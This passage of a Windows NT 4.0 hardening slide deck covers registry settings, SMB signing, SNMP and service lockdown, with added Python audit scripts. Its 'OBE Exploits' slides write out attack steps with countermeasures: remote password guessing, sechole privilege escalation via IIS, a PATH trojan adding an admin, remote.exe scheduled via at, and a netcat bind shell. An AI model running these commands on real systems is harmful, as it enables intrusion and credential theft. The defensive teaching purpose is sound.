– Administrator can configure which partitions are accessible via FTP, but not which directories

– So, assign a complete disk partition as the FTP store, and make that partition accessible only via FTP

Page 60: Services cont’d

• Port scans... use tools on your own network to detect which services are responding

– Log

– Analyze

• Against a checklist

• Pay special attention to changes since the last scan

• System account

– Sometimes the default, even when not needed

– Check with vendors

– Experiment running some services from a less privileged account

• Create a local account, e.g., “Unprivileged Service”, with a random 14-character password

• Deselect “User Must Change Password at Next Logon”

• Select “Password Never Expires”

• Assign only the necessary rights (“Log on as a service”, plus whatever the service itself needs)

– Don’t add the account to the local Administrators group...

• Edit the service’s properties to run from this new account instead of SYSTEM

Page 61: Network

• Domains and trust relationships

– Site-specific, so outside the scope of this discussion

– Be sure to protect the NETLOGON directory and subdirectories with appropriate ACLs

– See references

• Sutton, 1997

• TSS & NSA, 1998

• Multiple others...

• DNS

– Outside the scope of this discussion

Page 62: Networks cont’d

• Remote Access

– Another topic too complex for fair treatment

– Considerations for securing remote access include

• Physical connection... vulnerability to wiretapping at multiple points

• Protocols

• Authentication

• Cryptographic protection of data exchanges

– Technology choices include

• RAS

• VPN

• Remote control programs

Page 63: Networks cont’d

• <Explain multi-protocol, bindings>

• Whenever possible, unbind NetBIOS from TCP/IP on interfaces exposed to untrusted networks

• Disable IP routing (IP forwarding), so the host cannot be used to pass traffic between its interfaces

Page 64: Networks cont’d

• SMB Signing

– Introduction

• SMB is Microsoft’s native network file and print sharing protocol

• SMB signing is a cryptographic technique to protect against session hijacking and replay

• Does not encrypt/protect user data

– The signing key is derived from the user’s password

• Effective protection is the lesser of 40 bits (128 bits in the 128-bit version) and the key space of the user’s password

• A purely random 7-character user password has an effective key space of about 40 bits

– SMB sessions can be monitored, so captured traffic can be used for a brute-force attack on passwords

• Best security practice: don’t use SMB services over insecure networks

– Problem: not all SMB servers support SMB signing

• Some require the transmission of the user’s password in plaintext

• Example: Samba servers not configured for encrypted (challenge/response) passwords

Page 65: Networks cont’d

• SMB signing cont’d

– Enable and require SMB signing on the client (redirector) side through HKLM\System\CurrentControlSet\Services\Rdr\Parameters\EnableSecuritySignature and HKLM\System\CurrentControlSet\Services\Rdr\Parameters\RequireSecuritySignature (REG_DWORD, set both to 1)

– The server side has the same two values under HKLM\System\CurrentControlSet\Services\LanManServer\Parameters

– Caveat: requiring signatures on a server locks out clients that do not support signing; enable first, require only after verifying all clients

– Prevent NT from sending user passwords in plaintext... by ensuring the following value does not exist (or is 0): HKLM\System\CurrentControlSet\Services\Rdr\Parameters\EnablePlainTextPassword

Page 66: Network cont’d

• Restrict anonymous (null-session) network access

– To the registry (after SP3)

• HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes

• Ref MS-KB Q143138

– To enumeration of account names, groups and network shares

• HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous (REG_DWORD, set to 1)

• Ref MS-KB Q143474
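The registry settings on this slide and on the earlier Resources slides (page file clearing, 8.3 names, print drivers, DCOM, SMB signing, plaintext passwords, CD-ROM Autorun) are easiest to verify from an export rather than by clicking through regedt32. As an added example (not part of the original deck), the checker below parses a regedit.exe export (REGEDIT4 text format) and compares it against a checklist. The value names are the ones the slides cite; the expected settings (1 = restricted or enabled, 0 = off, “N” = DCOM disabled, “must not exist” for EnablePlainTextPassword), the helper names and the sample export are this example’s assumptions, constructed for illustration.

```python
"""Audit an NT 4.0 registry export (REGEDIT4 text) against a hardening checklist.

Added example: the value names come from the slides; the expected settings,
the helper names and the sample export below are this example's assumptions.
"""
import re

# (key path, value name) -> required value; None means "must not exist".
# Registry paths and value names are compared case-insensitively.
CHECKLIST = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management",
     "ClearPageFileAtShutdown"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem",
     "NtfsDisable8dot3NameCreation"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers",
     "AddPrintDrivers"): 1,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole", "EnableDCOM"): "N",
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "RestrictAnonymous"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rdr\Parameters",
     "RequireSecuritySignature"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rdr\Parameters",
     "EnablePlainTextPassword"): None,      # must not exist
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom", "Autorun"): 0,
}

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.+)$')


def parse_reg(text):
    """Return {(key_lower, name_lower): value} from REGEDIT4 text.

    dword:xxxxxxxx -> int, "string" -> str; other encodings (hex:...) kept raw.
    """
    values = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper() == "REGEDIT4":
            continue
        m = SECTION_RE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name, data = m.group(1), m.group(2)
            if data.startswith("dword:"):
                value = int(data[len("dword:"):], 16)
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                value = data[1:-1]
            else:
                value = data
            values[(key, name.lower())] = value
    return values


def audit_reg(text, checklist=CHECKLIST):
    """Return a list of findings; an empty list means every check passed."""
    values = parse_reg(text)
    findings = []
    for (key, name), expected in checklist.items():
        actual = values.get((key.lower(), name.lower()))
        where = key + "\\" + name
        if expected is None:
            if actual is not None:
                findings.append("WEAK    %s exists (=%r); delete it" % (where, actual))
        elif actual is None:
            findings.append("MISSING %s; set it to %r" % (where, expected))
        elif actual != expected:
            findings.append("WEAK    %s=%r; expected %r" % (where, actual, expected))
    return findings


# Constructed sample export: a partially hardened machine.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rdr\Parameters]
"EnableSecuritySignature"=dword:00000001
"RequireSecuritySignature"=dword:00000001
"EnablePlainTextPassword"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="N"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001
"""

if __name__ == "__main__":
    for finding in audit_reg(SAMPLE_REG):
        print(finding)
```

A value that is absent is reported separately from one that is present but weak, because on NT 4 most of these values do not exist until an administrator creates them, and an absent value means the insecure default is in force.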

Page 67: Networks cont’d

• RAS notes

– RAS uses the RC4 encryption algorithm

• The user’s password is part of the key, so it must be strong

• Recommended: use Administrator-generated random passwords for RAS accounts

– Recommended: RAS on a dedicated domain controller

• Limit access to just the RAS server

– Can’t remotely access resources on the (internal) network connected to the RAS server

» Controlled through the value HKLM\System\CurrentControlSet\Services\RemoteAccess\Parameters\NetbiosGateway, managed through the RAS Setup program

– Put home directories on the RAS server

» Enable a one-way trust by the RAS server of the local workstation domain

» Local access possible through the network

• Minimize services to the bare minimum

• Audit as much as you can stand...

Page 68: Networks cont’d

• Configure SNMP

– If required, otherwise delete it

– Control Panel | Network | Services | SNMP Service | Security

– Unless otherwise required, configure each community name for READ ONLY

– Restrict permissions on the SNMP registry key

• Default gives Everyone access

• Restrict to Administrators and other authorized users

– Key: HKLM\System\CurrentControlSet\Services\SNMP\Parameters

– Change the community name from the default ‘public’ to something more obscure (community names travel in the clear, so treat them as a weak password, not a secret)

• Src: NAI security advisory #30

• Analyzing listening ports... surprisingly hard... no good tools!
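The Services slides say to scan your own hosts, compare against a checklist and watch for changes since the last scan, and this slide notes that analyzing listening ports is hard and tool-poor. As an added example (not part of the original deck), the script below parses the text of `netstat -an` as NT prints it, keeps the set of listening ports, and diffs it both against the previous scan and against an approved list. The netstat output, the baseline and the approved list are constructed for illustration; the helper names are this example’s own.

```python
"""Baseline listening ports from `netstat -an` output and report changes.

Added example, not from the deck. The netstat output, the baseline and the
approved-port list are constructed; the function names are assumptions.
"""


def listening_ports(netstat_text):
    """Return {(proto, port)} for sockets that accept input.

    TCP: only LISTENING entries. UDP: every bound socket (netstat shows no
    state for UDP, and a bound UDP port receives datagrams).
    """
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local = fields[0], fields[1]
        port = int(local.rsplit(":", 1)[1])
        if proto == "TCP" and (len(fields) < 4 or fields[3] != "LISTENING"):
            continue
        ports.add((proto, port))
    return ports


def compare(current, baseline, approved):
    """Diff this scan against the previous one and against policy."""
    return {
        "new": current - baseline,           # appeared since last scan
        "gone": baseline - current,          # disappeared since last scan
        "unapproved": current - approved,    # listening but not on the checklist
    }


# Constructed `netstat -an` output from a host that now has an extra listener
# on TCP 8080 (compare the netcat example later in the deck) and has lost
# the NetBIOS datagram service on UDP 138.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    10.1.1.5:139           10.1.1.9:1034          ESTABLISHED
  TCP    10.1.1.5:1045          10.1.1.20:139          TIME_WAIT
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:161            *:*
"""

BASELINE = {("TCP", 135), ("TCP", 139), ("UDP", 137), ("UDP", 138), ("UDP", 161)}
APPROVED = {("TCP", 135), ("TCP", 139), ("UDP", 137), ("UDP", 138), ("UDP", 161)}

if __name__ == "__main__":
    result = compare(listening_ports(SAMPLE_NETSTAT), BASELINE, APPROVED)
    for kind in ("new", "gone", "unapproved"):
        print(kind, sorted(result[kind]))
```

Run it from a scheduled job that saves each scan, and a port that appears between scans (the TCP 8080 here) is the thing to chase; a port that disappears is worth a look too, since a stopped service can mean a crashed or tampered one.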

Page 69: Other

• Disable other boot media

– Password-protect the BIOS

– Change the boot sequence to fixed hard disk only (no floppy, no CD-ROM)

• Multiple copies of NT installed

– Emergency copy

– Ensure it is well-protected

– Note

• Built-in users and groups have the same identity (well-known SIDs) on all NT systems

• ACLs that hold only those identities are properly enforced by all co-resident copies of NT; ACLs that name accounts or groups local to one installation mean nothing to the other

Page 70: Other cont’d

• Remove POSIX subsystem

– Removal required for C2 because POSIX was not included in the evaluated system

– Potential vulnerabilities in how POSIX and Windows NT handle filename case

• POSIX always distinguishes between ‘abc.dll’ and ‘ABC.DLL’

• Win32 applications are usually case-insensitive

– Delete

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional\Posix

Page 71: Other cont’d

• Remove OS/2 subsystem

– Delete all subkeys in HKLM\Software\Microsoft\OS/2 Subsystem for NT

– Delete

• HKLM\System\CurrentControlSet\Control\Session Manager\Environment\Os2LibPath

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional\Os2

– Delete the \winnt\system32\os2 directory and all subdirectories

• Remove the 16-bit Windows subsystem (WOW, Windows on Windows) if no 16-bit applications are needed

Page 72: Other cont’d

• Consider disabling user access to floppy and CD-ROM drives

– Reasons

• Guard against (accidental) introduction of viruses, trojans, etc.

• Complicate data theft

– Constraints

• Can restrict access to the locally logged-on user (no sharing)

– HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AllocateFloppies (REG_SZ, set to 1)

– HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AllocateCdRoms (REG_SZ, set to 1)

• Can restrict access even to the local user

• Can lock

• Can remove

– Disable CD-ROM Autorun

• Registry value HKLM\System\CurrentControlSet\Services\Cdrom\Autorun (REG_DWORD, set to 0)

• May interfere with some installs... some CD-R software

Page 73: Other cont’d

• Display a legal notice before logon

– Not a technical countermeasure, but a method of reminding users of policy

– Put whatever you want into the message box via the registry values:

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText

• Always use the Secure Attention Sequence

– Three-finger salute (Ctrl+Alt+Del) to invoke the Windows NT Security window

• Logon, logoff, shutdown, etc.

– A logon or security dialog that is already displayed, without you having pressed the SAS, may be a trojan; the SAS itself is trapped by Winlogon and cannot be intercepted by an ordinary application

Page 74: OBE Exploits

• These should be OBE (overtaken by events)... already, or after you update your configuration

• Discussed only in terms of reinforcing earlier notes

• Getting the administrator password

– The NT architecture, even with default settings, severely restricts what remote users can do... unless they are using an account in the Administrators group

– Hackers tend to target local Admin accounts

• Local admins are more likely to have weaker passwords than domain admins

– Guessing still works... ex:

• net use \\1.2.3.4\IPC$ * /user:Administrator

– Specifying (*) for the password causes the remote system to prompt for it

• Type the password for \\1.2.3.4\IPC$: billg

• The command completed successfully.

Page 75: OBE Exploits cont’d

• Admin password cont’d

– Guessing cont’d

• Usernames are oftentimes obvious from email, etc.

• Usernames can be enumerated through anonymous (null-session) connections via net use

• Scripts (tools) can be used to guess passwords remotely and automatically

– Ex: Legion, NAT, NTInfoScan, SMBGrind

• Countermeasures:

– MS patch

– Good passwords

– Dummy Admin account (rename the real Administrator account, leave a decoy with no rights and audit it)

– Audit and monitor failed logons

• Privilege escalation

– getadmin

• Adds a user to the local Administrators group

• Uses a low-level NT kernel routine and DLL injection to insert its code into Winlogon

• Requires local access

Page 76: OBE Exploits cont’d

• Privilege escalation cont’d

– sechole

• Adds the current user to the local Administrators group

• Modifies, in memory, the instructions of the OpenProcess API call so that it can successfully attach to a privileged process regardless of whether it has the necessary permissions

• Once attached, works like getadmin

• Requires local access

• Updated sechole adds the current user to the Domain Admins group

Page 77: OBE Exploits cont’d

• Privilege escalation cont’d

– sechole cont’d

• With IIS, sechole can be launched remotely to add the Internet user’s account (IUSR_machinename) to the Administrators or Domain Admins group

– First, find an IIS directory that is both writeable and executable... lists exist

– Upload the executables and associated DLLs for sechole, cmd.exe, and ntuser

– Execute sechole through a URL that references it

– Then execute ntuser to add a new user... through a URL targeting cmd.exe

• Countermeasures

– MS patch

– Do not allow write access to executable directories on IIS

– Audit execute privileges

– Disable Windows file sharing on the IIS server... block TCP and UDP ports 135-139 at the border

Page 78: OBE Exploits cont’d

• Simple trojans

– Ex: hacker plants a regedit.cmd where cmd.exe finds it before the real regedit.exe in winnt\system32 (a directory earlier in the search order, or in place of the original)

– Admin types ‘regedit’ at the command line

– Batch file does something like net localgroup administrators <billg> /add and then invokes the real regedit.exe

– Countermeasures

• Appropriate permissions on trusted directories like winnt\system32

• Type the full path, or at least the full name with extension, when running tools from an administrative prompt

• Programs launched through registry settings

– Entries in registry areas like HKLM\Software\Microsoft\Windows\CurrentVersion\Run

– Countermeasures

• Appropriate permissions on the registry keys

• Monitor changes to these areas
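Whether a planted regedit.cmd, or an executable a user copied into a directory of their own (the “R” permission slide earlier), actually gets run depends on cmd.exe’s search order. As an added example (not part of the original deck), the simulation below reproduces that order: the current directory first, then each PATH directory left to right, and within a directory the PATHEXT extensions in sequence (.COM;.EXE;.BAT;.CMD by default). The upshot for the trojan on this slide is that a .cmd dropped beside the real .exe loses, but one in any directory searched earlier wins, and naming the extension explicitly defeats the same-name trick. The file layout, the PATH and the helper names are this example’s assumptions, constructed for illustration.

```python
"""Simulate how NT's cmd.exe resolves a bare command name, to show where a
planted regedit.cmd or a copied executable wins over the genuine tool.

Added example, not from the deck. Search order mirrors cmd.exe: current
directory, then PATH left to right; within a directory, PATHEXT extensions in
order. The file layout, PATH and function names are constructed assumptions.
"""

DEFAULT_PATHEXT = (".com", ".exe", ".bat", ".cmd")


def matches(command, cwd, path_dirs, files, pathext=DEFAULT_PATHEXT):
    """All existing files matching `command`, in the order cmd.exe tries them.

    files: set of existing files, full paths, lower-case, backslash-separated.
    """
    command = command.lower()
    if any(command.endswith(ext) for ext in pathext):
        candidates = [command]                      # extension given: no PATHEXT search
    else:
        candidates = [command + ext for ext in pathext]
    found = []
    for directory in [cwd] + list(path_dirs):
        for name in candidates:
            full = directory.lower().rstrip("\\") + "\\" + name
            if full in files:
                found.append(full)
    return found


def resolve(command, cwd, path_dirs, files, pathext=DEFAULT_PATHEXT):
    """The file cmd.exe would actually run for `command`, or None."""
    found = matches(command, cwd, path_dirs, files, pathext)
    return found[0] if found else None


# Constructed layout: the genuine tool, a planted .cmd beside it, and a
# planted .cmd in a directory the admin happens to be working in.
PATH = [r"C:\winnt\system32", r"C:\winnt"]
FILES = {
    r"c:\winnt\system32\regedit.exe",
    r"c:\winnt\system32\regedit.cmd",
    r"c:\temp\regedit.cmd",
}

if __name__ == "__main__":
    print(resolve("regedit", r"C:\winnt", PATH, FILES))      # the real .exe wins
    print(resolve("regedit", r"C:\temp", PATH, FILES))       # trojan in cwd wins
    print(resolve("regedit.exe", r"C:\temp", PATH, FILES))   # explicit name defeats it
    print(matches("regedit", r"C:\temp", PATH, FILES))       # everything in play
```

`matches` is the defender’s view: everything it returns after the first entry is a file that could shadow the tool from a different working directory, so each one needs either removing or the ACL that keeps users from creating it.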

Page 79: OBE Exploits cont’d

• Using NT Resource Kit tools for remote control

– Tools

• Remote Command Service (rcmd.exe and rcmdsvc.exe for client and service)

• Remote Command Line (remote.exe)

– Can be launched in client or server mode

– More popular

• Service controller (sc.exe)

– Step 1: copy remote.exe to an executable path on the target

• Connect to the admin share C$ as Admin

• Copy remote.exe to winnt\system32... well hidden there among all the other executables

• Counters: delete admin shares, protect the Admin account

Page 80: OBE Exploits cont’d

• NTRK tools cont’d

– Step 2: start the Schedule service on the target system

• sc \\1.2.3.4 start schedule

• net time \\1.2.3.4

– So remote.exe can be scheduled in Step 3

• Counters: disable the Schedule service

– Step 3: launch an instance of remote.exe as a service on the target

• at \\1.2.3.4 <time> "remote /s cmd secret"

– Where <time> = result from Step 2’s net time + 1-2 minutes

• Check with: at \\1.2.3.4

Page 81: OBE Exploits cont’d

• NTRK tools cont’d

– Step 4: enjoy remote control

• [Attacker]: remote /c 1.2.3.4 secret

• [Response]: <snip> Connected..

C:\ {command prompt on remote target machine}

• [Attacker]: dir winnt\repair\sam

• [Response]: {file attributes of the SAM backup on the target}

• [Attacker]: @q

• [Response]: *** SESSION OVER ***

– The server is still running on the remote target computer

Page 82: OBE Exploits cont’d

• Netcat... another remote control tool

– Step 1: launch netcat on the target machine: nc -L -d -e cmd.exe -p 8080

• -L makes the listener persistent across multiple connection breaks

• -d detaches netcat from the console (“stealth mode”)... no visible window

• -e specifies the program to launch... cmd.exe in this example

• -p specifies what port to listen on... port 8080 in this example

– Step 2: enjoy remote access

• [Attacker]: nc 1.2.3.4 8080

• [Response]: {command shell prompt on the remote target machine}

• [Attacker]: ipconfig

• [Response]: {information about the remote machine’s ethernet adapter}

• [Attacker]: exit

• NetBus and Back Orifice are other examples of remote control programs

• WinVNC hijacks the NT GUI

Page 83: Sources

• White papers

– Securing Windows NT Installation, Microsoft, Oct 1997

• Backgrounder in the MSDN library

• Hardcopy available from Nugen

– Windows NT Security Guidelines

• Oftentimes referred to by MS publications

• Steve Sutton (Trusted Systems Services) and Scott Cothrell (National Security Agency); March 1998

• Src: http://www.trustedsystems.com/tss_nsa_guide.htm

– Microsoft Internet Information Server 4.0 Security Checklist

• Microsoft; March 2000

• Src: www.microsoft.com/technet/security

– Windows NT 4.0 Domain Controller Security Checklist

• Microsoft; March 2000

• Src: www.microsoft.com/technet/security

Page 84: Sources cont’d

– Windows NT 4.0 System Administrator’s OS Handbook

• GSA, unknown time frame

• Src: http://bsp.cio.gov/ ... have to drill down

– Monitoring and Auditing for End Systems

• MS; July 2000

• Src: www.microsoft.com/technet/security

• Microsoft Product Security bulletins

– www.microsoft.com/technet/security

• Newsletters, email

– Security Update from www.win2000mag.com

– Security Wire Digest from www.infosecuritymag.com

Page 85: Sources cont’d

• Online sampler... portals, conferences, etc.

– www.sans.org

• Sells a step-by-step checklist for securing WinNT systems

– Best practices, consensus of multiple experts

– Recommended by folks who have used it

– www.ntsecurity.net

– www.securityportal.com

– www.icsa.net

– www.antionline.com

– www.securityfocus.com

– www.counterpane.com

– www.gocsi.com

• Print magazines

– Windows 2000 Magazine

– Information Security... www.infosecuritymag.com

– SC Magazine... www.infosecnews.com

Page 86: Sources cont’d

• Books

– Windows NT Security Guide

• Stephen A. Sutton

• 1997

• Addison-Wesley

– Inside Windows NT Server 4

• Drew Heywood, et al.

• 1997

• New Riders

– Windows NT Server 4: Security, Troubleshooting, and Optimization

• Wayne Dalton, et al.

• 1996

• New Riders

– Windows NT User Administration

• Ashley Meggitt and Timothy Ritchey

• 1997

• O’Reilly

Page 87: Sources cont’d

• Books cont’d

– Maximum Security, 2nd Ed

• Anonymous

• 1998

• SAMS

– Hacker Proof: The Ultimate Guide to Network Security

• Lars Klander

• 1997

• Jamsa Press

– Hacking Exposed

• Stuart McClure, Joel Scambray, George Kurtz

• 1999

• Osborne/McGraw-Hill

Page 88: Questions... Discussions